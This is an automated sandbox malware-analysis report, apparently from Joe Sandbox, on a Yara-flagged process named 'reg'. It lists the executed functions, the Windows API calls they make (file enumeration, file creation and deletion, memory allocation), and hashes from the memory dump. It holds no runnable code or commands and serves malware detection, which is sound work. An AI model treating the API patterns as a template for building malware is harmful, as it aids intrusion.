2cf1081 98157->98159 98162 2cfa270 RtlAllocateHeap 98159->98162 98161 2cf108c 98162->98161 98163 2cf7f60 98164 2cf800c 98163->98164 98166 2cf7f88 98163->98166 98165 2cf8022 NtCreateFile 98164->98165 98169 2cd9777 98170 2cd974d 98169->98170 98171 2cd9770 98170->98171 98172 2cd975d CreateThread 98170->98172 98173 2ce28b0 98174 2ce28d5 98173->98174 98175 2ce4660 LdrLoadDll 98174->98175 98176 2ce290b 98175->98176 98177 2ce6180 2 API calls 98176->98177 98178 2ce2933 98176->98178 98177->98178 98179 2cec070 98181 2cec099 98179->98181 98180 2cec19d 98181->98180 98182 2cec143 FindFirstFileW 98181->98182 98182->98180 98185 2cec15e 98182->98185 98183 2cec184 FindNextFileW 98184 2cec196 FindClose 98183->98184 98183->98185 98184->98180 98185->98183 98186 2cefa30 98187 2cefa42 98186->98187 98188 2ce4660 LdrLoadDll 98187->98188 98189 2cefa6b 98188->98189 98190 2ce6c30 98191 2ce6c5a 98190->98191 98194 2ce7b60 98191->98194 98193 2ce6c84 98195 2ce7b7d 98194->98195 98201 2cf7990 98195->98201 98197 2ce7bcd 98198 2ce7bd4 98197->98198 98199 2cf7a60 LdrInitializeThunk 98197->98199 98198->98193 98200 2ce7bfd 98199->98200 98200->98193 98202 2cf7a20 98201->98202 98203 2cf79b4 98201->98203 98206 3592f30 LdrInitializeThunk 98202->98206 98203->98197 98204 2cf7a59 98204->98197 98206->98204 98207 2cf76f0 98208 2cf7774 98207->98208 98209 2cf7714 98207->98209 98212 3592ee0 LdrInitializeThunk 98208->98212 98210 2cf77a5 98212->98210 98213 2cf81b0 98214 2cf821c 98213->98214 98216 2cf81d4 98213->98216 98215 2cf8232 NtDeleteFile 98214->98215 98217 2cf13b0 98220 2cf13bf 98217->98220 98218 2cf1406 98219 2cfa150 RtlFreeHeap 98218->98219 98221 2cf1416 98219->98221 98220->98218 98222 2cf1444 98220->98222 98224 2cf1449 98220->98224 98223 2cfa150 RtlFreeHeap 98222->98223 98223->98224

                                                Executed Functions

                                                Function 02CEC070 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02CEC154
                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02CEC18F
                                                • FindClose.KERNELBASE(?), ref: 02CEC19A
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNext
                                                • String ID:
                                                • API String ID: 3541575487-0
                                                • Opcode ID: 3acf259d6109fd6736eedfc37785589ff6e5c3605d2951ae41d862d85f944664
                                                • Instruction ID: 2ed47248c5c8d2697d12d7c36c89d33300c1791ff463e3e193db2824e5711f35
                                                • Opcode Fuzzy Hash: 3acf259d6109fd6736eedfc37785589ff6e5c3605d2951ae41d862d85f944664
                                                • Instruction Fuzzy Hash: 25316371900248BBDF61EFA4CC85FFF777DAB94748F144459BA09A7180DB70AB849BA0
                                                Function 02CF7F60 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02CF8053
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 7d3918d96377d45380e5f96e3ccee75bb942a6a2a95961f6c7ba960d242533c7
                                                • Instruction ID: e3159937b33e4fe80ca2d8f5b840245da4d4bffff21c6e326393bedff8c06ac3
                                                • Opcode Fuzzy Hash: 7d3918d96377d45380e5f96e3ccee75bb942a6a2a95961f6c7ba960d242533c7
                                                • Instruction Fuzzy Hash: 9631C6B5A11609AFCB44DF99D881EDFB7F9AF8C314F108219FA19A3240D770A951CFA4
                                                Function 02CF80C0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02CF819E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 42ae1454f79cb2b1805eedd885f160374091396aa826fe47bbc75e170c91e90f
                                                • Instruction ID: 9a68e44cda0d799c577355f8449771374e0e15a659068b325ef33ad0683a81d1
                                                • Opcode Fuzzy Hash: 42ae1454f79cb2b1805eedd885f160374091396aa826fe47bbc75e170c91e90f
                                                • Instruction Fuzzy Hash: D431E6B5A00209ABCB54DF99DC80EEFB7B9AF8C314F108609F918A7240D770A9118FA4
                                                Function 02CF83B0 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(02CE1BDE,?,02CF6FC7,00000000,00000004,00003000,?,?,?,?,?,02CF6FC7,02CE1BDE,?,02CF0A11,02CF6FC7), ref: 02CF8470
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: 9cf9ea5c621c8626a6e8b2e8105620b837b0ca86e8c8e2689626e4cebbda9284
                                                • Instruction ID: 0255acd26044e196ee149a0d37e1e0f2da1bf070efca1891c30d2d1764d46e23
                                                • Opcode Fuzzy Hash: 9cf9ea5c621c8626a6e8b2e8105620b837b0ca86e8c8e2689626e4cebbda9284
                                                • Instruction Fuzzy Hash: B121FBB5A11208ABCB54DF59DC41FEBB7B9AF88314F108509FE18A7240D770A9118FA5
                                                Function 02CF81B0 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 7b011d83d8022cc843fb96c18d267e3105f121b7b855ae6b2747f5c3e8142fda
                                                • Instruction ID: 742c41ab8f8f21fdaf09f1300e67b9e0a1fcc331b239b464a7213eb054094285
                                                • Opcode Fuzzy Hash: 7b011d83d8022cc843fb96c18d267e3105f121b7b855ae6b2747f5c3e8142fda
                                                • Instruction Fuzzy Hash: EA016D72A51608BBD660EAA8DC41FEB77ADDB88714F104409FA18A7180D7B079148FE5
                                                Function 02CF8250 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02CF8284
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: e0810c323cfcc0e7647bb5a42e0f007d5aaa40598f42369497cf261a307a9015
                                                • Instruction ID: 90cfd72eb7373361d17cd3a8c911cce0bbf5c09d27e001849d66137cf575ee2c
                                                • Opcode Fuzzy Hash: e0810c323cfcc0e7647bb5a42e0f007d5aaa40598f42369497cf261a307a9015
                                                • Instruction Fuzzy Hash: CDE08C32200204BBC620EA69DC40FDBB7ADDFC5764F518419FA0CA7281C6B0BA01CBF0
                                                Function 03594340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: eec91b5698135072a423cadd2704b6b044750fa8c651833e0538ad20b9bc50dd
                                                • Instruction ID: b52ab2dc8ba592e99cdd20d96364e768c3c7471fbcab1b59221fbe84f9d9a85e
                                                • Opcode Fuzzy Hash: eec91b5698135072a423cadd2704b6b044750fa8c651833e0538ad20b9bc50dd
                                                • Instruction Fuzzy Hash: CA900271B05C04129140B19C588454A4445A7E0311B59C011E4424555C8B148A566361
                                                Function 03594650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1cbbaf8dd4a67dabc4ed6fc412236f6599ce30cbd733f11e877e37b3f1a9e166
                                                • Instruction ID: e9d2cdcbbbc49037cc454e31988fbfef554df4e0d93c9420e146d38b4e59d74a
                                                • Opcode Fuzzy Hash: 1cbbaf8dd4a67dabc4ed6fc412236f6599ce30cbd733f11e877e37b3f1a9e166
                                                • Instruction Fuzzy Hash: 919002A1B01904424140B19C580440A6445A7E1311399C115A4554561C87188955A269
                                                Function 03592B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ed018b0c10118ada896c21731299f428eef61f5ee6001cd5bd895312450a61dc
                                                • Instruction ID: 802ec71dbabcc4a006a0261f5aad904c3d50ebd5e37d0e8c68207e83eb9a9ad7
                                                • Opcode Fuzzy Hash: ed018b0c10118ada896c21731299f428eef61f5ee6001cd5bd895312450a61dc
                                                • Instruction Fuzzy Hash: A49002A1702804034105B19C541461A444A97E0211B59C021E5014591DC62589917125
                                                Function 03592BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d35e887f4203a018af3e68bbccfe4bd48a5d5d32f01abd6d13adabcfff7dfb2e
                                                • Instruction ID: 29bc0c5db9ab6818b12b1ef041842794d9ecaa1823d6df63b4653b45ed07f5ce
                                                • Opcode Fuzzy Hash: d35e887f4203a018af3e68bbccfe4bd48a5d5d32f01abd6d13adabcfff7dfb2e
                                                • Instruction Fuzzy Hash: EB90027170180C02D180B19C540464E044597D1311F99C015A4025655DCB158B5977A1
                                                Function 03592BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c94a1f0c619cd0f33b69918cf75fb071b1f098cdf2819e43b755a5c90918b8d0
                                                • Instruction ID: 0d5d4d7fb652e933d6ba33416a13338fa92d3556c855ec544043872f4bfa3c78
                                                • Opcode Fuzzy Hash: c94a1f0c619cd0f33b69918cf75fb071b1f098cdf2819e43b755a5c90918b8d0
                                                • Instruction Fuzzy Hash: A790027170584C42D140B19C5404A4A045597D0315F59C011A4064695D97258E55B661
                                                Function 03592BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7a350267988bc1b23fe60cbc53a3f6d84358f385b78eab9705b3d328f5840fa6
                                                • Instruction ID: 9468bbe7002ee507710bd4fe4672ac318ad9979e9cbdcd648ff622c6bf2dabc4
                                                • Opcode Fuzzy Hash: 7a350267988bc1b23fe60cbc53a3f6d84358f385b78eab9705b3d328f5840fa6
                                                • Instruction Fuzzy Hash: 6D900271B0580C02D150B19C541474A044597D0311F59C011A4024655D87558B5576A1
                                                Function 03592AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d74c4913c5e6a045dbf0ad11ae6ba2c894a2a8983cd339bd6a9c9437accc1337
                                                • Instruction ID: add290cf6b84d430d1ad8531119f0e66ae4f17a1c0064566f813d7f13074038a
                                                • Opcode Fuzzy Hash: d74c4913c5e6a045dbf0ad11ae6ba2c894a2a8983cd339bd6a9c9437accc1337
                                                • Instruction Fuzzy Hash: 50900265711804030105F59C170450B048697D5361359C021F5015551CD72189616121
                                                Function 03592AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5446c3304ee1bd0e854c876d35375df9df62d5d888aef6ad7fe75b9d759cefe7
                                                • Instruction ID: 00f39f81a1f7724eccf417e361bc9b492d1215b8bf2fe7738845c83d48b6fc61
                                                • Opcode Fuzzy Hash: 5446c3304ee1bd0e854c876d35375df9df62d5d888aef6ad7fe75b9d759cefe7
                                                • Instruction Fuzzy Hash: D2900265721804020145F59C160450F0885A7D6361399C015F5416591CC72189656321
                                                Function 03592F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5b97d83d7cd6122f79cf2abbe0d0b6f61821500d98d7bd2f0ceca2ed18822d3b
                                                • Instruction ID: e1cd2069a059730ebe07098000d4114107cb082b758eb66c964343823df4cfb7
                                                • Opcode Fuzzy Hash: 5b97d83d7cd6122f79cf2abbe0d0b6f61821500d98d7bd2f0ceca2ed18822d3b
                                                • Instruction Fuzzy Hash: E59002A174180842D100B19C5414B0A0445D7E1311F59C015E5064555D8719CD527126
                                                Function 03592FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cfcf42b14794b7c624cce46db86ffa35477d9b8029d587657ac4041b8e30ddb3
                                                • Instruction ID: 8d8e44545d18078c7ee480ab0b9a5c04a4c0a26f668dc8d0f454236ce62aee27
                                                • Opcode Fuzzy Hash: cfcf42b14794b7c624cce46db86ffa35477d9b8029d587657ac4041b8e30ddb3
                                                • Instruction Fuzzy Hash: 9D900261711C0442D200B5AC5C14B0B044597D0313F59C115A4154555CCA1589616521
                                                Function 03592FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b76d20f2b6ec9fe062654f75a4f0664d3428403a9755d81da98f0e8af99e3ec6
                                                • Instruction ID: d7c9b9066eef7c42a8dcb64f6f014f14de5d80709509fedd026beeb9dd6c0315
                                                • Opcode Fuzzy Hash: b76d20f2b6ec9fe062654f75a4f0664d3428403a9755d81da98f0e8af99e3ec6
                                                • Instruction Fuzzy Hash: 71900261B01804424140B1AC984490A4445BBE1221759C121A4998551D865989656665
                                                Function 03592EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b5117c75e05bdcbd57560fc6f2b1e8aa42ad1f34381ffa63c64c8e037fc1118b
                                                • Instruction ID: 0c49aa41406bdf85a04977df77e8a88aa2c552000ffb0e95d5f30f116c528a01
                                                • Opcode Fuzzy Hash: b5117c75e05bdcbd57560fc6f2b1e8aa42ad1f34381ffa63c64c8e037fc1118b
                                                • Instruction Fuzzy Hash: 459002A1701C0803D140B59C580460B044597D0312F59C011A6064556E8B298D517135
                                                Function 03592E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 667f89aa90cf600e9bbdd1925af907a49b4af381fc8809b4f18dbf8ad4f178b4
                                                • Instruction ID: 67b0338459e8464f331971a1c424c53eac8c4b4d68221ad791295122d52cf3ee
                                                • Opcode Fuzzy Hash: 667f89aa90cf600e9bbdd1925af907a49b4af381fc8809b4f18dbf8ad4f178b4
                                                • Instruction Fuzzy Hash: B5900261B0180902D101B19C540461A044A97D0251F99C022A5024556ECB258A92B131
                                                Function 03592D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a1078fac3d714a8177ca0053bfdf52081897be6e562742149722f0fcb1459130
                                                • Instruction ID: 7a55a79002e563c910ab2b2860a68787bc7c2864769725b4d13abded03ad78a6
                                                • Opcode Fuzzy Hash: a1078fac3d714a8177ca0053bfdf52081897be6e562742149722f0fcb1459130
                                                • Instruction Fuzzy Hash: 7A90026971380402D180B19C640860E044597D1212F99D415A4015559CCA1589696321
                                                Function 03592D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 07be760bf95b5feaf640b21bd98612e1cb3a23df228ecad7e5dc11bae70e12a5
                                                • Instruction ID: 5df522d8126148aab4d445be0c5cd3ca67153e71abffbd8fc0804d6ff60afc50
                                                • Opcode Fuzzy Hash: 07be760bf95b5feaf640b21bd98612e1cb3a23df228ecad7e5dc11bae70e12a5
                                                • Instruction Fuzzy Hash: D890026170180403D140B19C641860A4445E7E1311F59D011E4414555CDA1589566222
                                                Function 03592DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ae51beeb5285a9133024435cbd516468403b03d5ed43862da4d3aaf5bb992488
                                                • Instruction ID: aa3f9e4d35fccab68a5a7ce70fa5fbf021b1e2d4aa00c15e4689c782faa7e707
                                                • Opcode Fuzzy Hash: ae51beeb5285a9133024435cbd516468403b03d5ed43862da4d3aaf5bb992488
                                                • Instruction Fuzzy Hash: A0900261742845525545F19C540450B4446A7E0251799C012A5414951C86269956E621
                                                Function 03592DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
